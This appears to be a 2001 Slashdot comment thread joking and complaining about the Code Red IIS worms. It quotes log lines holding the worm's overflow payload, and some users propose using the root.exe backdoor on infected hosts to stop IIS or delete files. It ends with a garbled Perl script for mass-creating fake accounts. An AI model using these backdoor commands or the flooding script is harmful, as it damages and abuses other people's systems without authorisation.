IIS doesn't even run on 9x, ME, or other spawn of 3.x

Actually you can run a mini version of IIS that could be suspectible to code red on a 95 or 98 machine. The personal webserver from MS is advertised as only working on NT but it'll run on 95 or 98. I haven't tested it 95 though.

I've gotten default.ida hits from PSW so I know its suspectible to at least one kind of code red.

And next...

[Balinares]

Check out the amazing prequels!! CodeRed 0, CodeRed -1, and then BetaCode, in all theat-- err, all MS servers, starting next week! Don't miss the excitement!!

Coming Soon!

[AndroidCat]

A major haxor group is rumoured to be close to releasing a new product: Code RedHat

The group spokesit 3v1l d00mm said "Yeah well, why should clueless Windoh!s lusers have all the fun? There's a lot of clueless Linux lusers these days who just install RedHat out of box, and don't add the patches. You can root these machines in less than a minute, but where's the fun in that? Besides, with Linux and a good connection, even 386 boxenthings with 8 meg ram are deadly! We expect that Code RedHat will show the world how much better Linux is than Microsludge. If you thought hundreds of thousands of copies of Code Red I/II slowed the net, watch what even a couple thousand copies of Code RedHat can do!"

I asked if they planned to distribute through store channels, Internet, or corporate clients, he grinned and said "Distribution will not be a problem."

When asked if they plan to make it Open Source, 3v1l d00mm said "Hey, we'd like to but we're still talking to our lawyers, and what with the IPO coming up, project deadline and all that, we'll have to see."

Time for class action against Microsoft...

[Julz]

Doens't this seem like a good time for all the owners of websites that pay for bandwidth usage on their sites, to join forces and take out a class action suit against Microsoft for allowing for such an easy exploited backdoor into their "Enterprise" class web server or dumpster and having their servers then spam the internet looking for other servers with their insidious backdoors.
Time Microsoft paid for the crap that they foist onto Corporates and Individuals alike.
Might finally get some real financial support for the open source movement via payouts from this sort of thing to people using alternative web servers, etc.
Does anyone know if this kind of backdoor might exist in Microsoft's "Enterprise" Mail Server Exchange. Must be somewhere with all the new "features" they've added.

The solution

[tbone1]

I'm still wondering what I should do with the hundreds of IPs in my desktop's apache log trying hopelessly to overflow my buffer.

Obvious! Put a story about them on slashdot, with a link to their server. They'll be shut down in no time!

stopping code red

the account that you access web pages through on an iis server doesn't have the rights to do anything very drastic, such as stopping the service or downloading and installing the patch. so this being said, there is only one thing that will stop the worm, a world wide power outage that outlasts all the battery back ups and generators, or short of that, diligent work my everyone who's getting attacked to make sure that some educated person knows about every infected box. this being said it's prob. safe to assume that new victims roll out of computer manufactures on a daily basis with iis enabled by default on 2k pro and server machines. which means that even if code red II drops away, there will always be an available audience for code red III,IV, or V.

that's what i think if you don't like it, attack my ideas not me

The Underlying Problem ...

[dbCooper0]

Ya Well,

I thought @home was not so wrong for blocking incoming packets to port 80, but guess what?

I had an attack about 30 seconds after I turned IIS back on (upon reading some of the above and getting curious).

Also, for at least a week and ½, I've been getting hit with ARP-RARP packets at the rate of 10 or more per second from what I believe to be a router in Muskegon, with targets of all the still-infected machines.

It's obvious that AT&T has not kept up its own side of the TOS - and curious that when I signed up for cable modem last year, they wouldn't support Win2k (cough, cough - I have to run it - I'm a MCSE with too many clients running it to get rusty), and the reason for No Servers was to avoid some idiot issuing DHCP to the other customers.

BTW, I'm used to getting diddle from large corporations in the way of customer service - I just hope I can get them to fix my lawn before the snow flies. Some brain-dead cable rat drove his boom truck over my lawn to check a pole, and the lawn is about a foot above water level. I complained a montha and a half ago and still no response!

(If anyone on /. would care to identify the "strain" of the worm that just tried me, I'd be happy to squirt the log text in the thread - with my IP removed to protect the innocent...)

No prob, the download is here

[WillSeattle]

God, I'm still on version 1 of code red. Does anybody know where I can download the latest version? Is there a mail list I can get on so I know I have the lasted version on my IIS server?

Try Microsoft or Hotmail. I think they have the latest version of it running on most of their systems now.

default.ida web logs

Taco wanted to know what to do with his web logs, what we've been doing is punching the following URL into our browsers whenever we see one of those stupid requests... http://_IP_OF_SERVER_/scripts/root.exe?/c+net%20st op%20w3svc That will shut down IIS on the machine... Should get their attention and hopefully modevate them to fix their shit...

a harsher solutions, perhaps?

[WickedLittleSlaveBoy]

it's obvious the patches aren't working....so, can we round up all the useless MCSE's and string them up this time?

Can I have a complet IP list...

[linuxrochester]

I would love to have a complete IP list of all infected servers. This way, I can send my resume to all of the infected companies for a SysAdmin job! Apparently the current Admin's aren't worth a sh*t!! How hard is it to install a patch. Maybe these morons just enjoy watching the worm propogate! Give me a good salary, and I WILL install the patch!!

New Code Red Worm patches here

ok you bigots :)

[Gnea]

since people are whining about not seeing CR3 show up yet, i just had it hit about 30 minutes ago, here's the log:

!IP goes here! - - [10/Aug/2001:13:44:15 -0400] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858% ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%uc bd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531 b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 1141 "-" "-"

Not Code Red 3

[lqx]

Just FYI, Even CNet says it's not Code Red 3. And you know you can trust them .. emm ... ok .. maybe trust them..

here is the story.

How many more???

[9sPhere]

Are we going to be on Code Red version 99.1 before some of these dumb ass sysadmins take a little time and just patch their POS IIS servers? How many times do you need to be kicked in the crotch before you learn to get out of the way???

Re:Gives me an idea to stop it spreading so fast..

[srw]

It's been done. It's been on slashdot.

http://slashdot.org/article.pl?sid=01/08/04/1413 21 1&mode=thread


Look for "codeRedNeck"

Re:Code Red infection in spite patch - moderation

[shibut]

I've posted a few times so far and it's always at score=0, I'm wondering why since Shibut != AC ... DO I have to add some $%^&**(^%#@ to get moderated to a measly 1-2?

GIMPS - pull a Blosser

[sphix42]

I'm still wondering what I should do with the hundreds of IPs in my desktop's apache log trying hopelessly to overflow my buffer.

AB explains how to install GIMPS here. I'm not a proficient enough nt scripter to do this to comprimised machines, but I have a nice big list of ip's I'd love to install GIMPS on!

So does the GPL

[roju]

Have you ever read the GPL?

It specifically disclaims any and all liabilities and warranties.

If the Microsoft EULA disclaiming responsibility is invalid, isn't the GPLs? If you argue that GPLed software is free, so consumer protection laws don't apply, then what if you paid Red Hat $15 for their distribution?

Regardless of whether you paid them for the packaging or the 1-800 support number, you bought something from 'em, so shouldn't they be liable if your linux box ruins your MySQL database?

Road Runner is getting blized by CR II

My apache server is sitting here in San Diego getting about one hit every 5 minutes from CR II.

Code Red one looked like this:
[root@dt000n00 /root]# cd /var/log/httpd/
[root@dt000n00 httpd]# more access_log

195.117.17.130 - - [19/Jul/2001:19:24:15 -0700] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858% ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%uc bd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531 b%u53ff%u0078%u0000%u00=a HTTP/1.0" 400 333

Code Red IIs look like this:

[root@dt000n00 httpd]# grep "XXXXXXXX" access_log |more
204.210.27.38 - - [04/Aug/2001:09:21:23 -0700] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858% ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%uc bd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531 b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 281

[root@dt000n00 httpd]# grep "NNNNNNNNN" access_log |wc -l
121
[root@dt000n00 httpd]# grep "XXXXXXXXX" access_log |wc -l
1616

That's it. 10 days, and less than 2000 hits. BIG WHOOP. Yawn. Some idiots IIS server is down? Who cares? This is *not* the end of the internet.

very strange

[mackermacker]

The first time I went to the site, i was bombarded by a huge flash advertisement for absolute vodka, the second time nothing..

Why wont someone release a worm that affects web advertisements in the middle of an article?

Put it in another log and forget about it.

[Malc]

"I'm still wondering what I should do with the hundreds of IPs in my desktop's apache log trying hopelessly to overflow my buffer. "

I'm not even sure how to spell regexe, but this is what I've attempted to do:

SetEnvIf Request_URI /(.*default.ida.*$) code-red-request
CustomLog /var/log/apache/code-red-request.log common env=code-red-request
#CustomLog /var/log/apache/access.log common
CustomLog /var/log/apache/access.log common env=!code-red-request

RedirectMatch Permanent /(.*default.ida.*$) http://127.0.0.1/$1

Will this even work?

[TheMidget]

I think you need to reboot the machine first, in order to remove file protections, which would otherwise prevent the disk from being formatted. And for some stoopid reason, GET /script/root.exe?+%2fc+iisreset+reboot doesn't seem to work...

Microsoft's New Logo

[clone22]

.. should be a pair of old jeans with patches all over them.

I heard something -

[mergy]

Microsoft is releasing Code Red IV a month earlier so the various virus companies don't quash their abilitiy to innovate.

And more will come...

[Bagheera]

This sounds a lot like the derivitives of the ILoveYou Outlook Virus. Someone does the initial exploit, and other people modify the code to be more destructive, carry a different payload, whatever. Chances are we'll see more variations on this theme in the near future.

The sad part is that it appears that the vast majority of infected systems are owned by folks who don't even know they have IIS installed on their machine. It was either part of a default load, or they clicked "YES" at some point in an installation without really understanding what they were saying YES to.

Personally, I think we need to have a lot more coverage of this than we're getting. A lot more instances of "If you are running a Windows system, please install all the latest patches today!" on the news, web, etc. Though to be fair, there are a lot of *IX systems unpatched out there too...

I know.

Wishful thinking...

Interesting Irony

[Naerbnic]

So, Three Code Reds and a SirCam later, the question just begs to be asked:

Who's calling Whose code "Potentially Viral"?

Reply to them with this friendly little "howdy"

http://IpOfHackedMachine/scripts/root.exe?/c+DIR+c :\

Or maybe

http://IpOfHackedMachine/scripts/root.exe?/c+DEL+c :\*.*

Roman numerals not a good idea

[Mark+of+THE+CITY]

I can see it now, a bearded discourse on the differences between CodeRed MCMLXXXIII and MCMLXXXIV...

Service Name for IIS is....

inetinfo.exe

But you didn't hear that from me......

Re:Sig (Offtopic(Offtopic))

[sh00z]

someone should make a "sig archive" on the web

Here's the one I'm in. There may be others, but who cares?

Worthy

[fobbman]

Now this is a sequal worthy of the name The Clone Wars.

Code Red 95

[ArtWDrahn]

I can't wait until Code Red 76. I heard this version will wash your car, take your pet for a walk, reformat any version of Linux and install Windows over it, all in it's first 30 nanoseconds of birth. Personally I look forward to it. God knows it was created by the Borg known as Microsoft. ^_^

Redhat's unnecessary daemons

[Macrobat]

Though to be fair, some Linux distributions - cought, RedHat, cough - turn on all sorts of random services by default that the user probably doesn't want/need.

They fixed that as of RH 7.1.

report them to securityfocus.com!

securityfocus (a.k.a bugtraq) is collecting infected IP addresses with timestamps. send them to aris-report@securityfocus.com. i have been keeping track of the hits to my system at debussy.ucsc.edu.

I think you're on to something...

[Nate+Fox]

According to Symantec's page on CR2:

Also Known As: CodeRed.v3, CodeRed.C, CodeRed III, W32.Bady.C

new name

[sp0rch]

we should rename, this is boring, like maybe code-reder, or code-evenreder, or code-redmund

Redundant Response

It's illegal to do anything to another person's computer without their permission, even if your intentions are benign. You get caught, you go to jail.

I won't complain if someone else does it, though.

Re:M*derators!

Blah. STFU with the whinging before j00 are modded down forever. If you don't like the way Slashdot works, run this script ;)... #!/usr/bin/perl use IO::Socket; srand(time^$$); # Set $c to uid count: $c = 20_000_000; # create 20,000,000 new accounts. sub junk { #create $_ many random letters. $s=""; for($j=0;$j'tcp', PeerAddr=>"slashdot.org", PeerPort=>80); $sock->autoflush(1); print $sock "GET /users.pl?op=newuser&newuser=$n&email=$e HTTP/1.0\r\n"; print $sock "User-Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)\r\n"; print $sock "Referer: http://slashdot.org/users.pl\r\n \r\n"; close($sock); print "Created $n ($e)\n"; }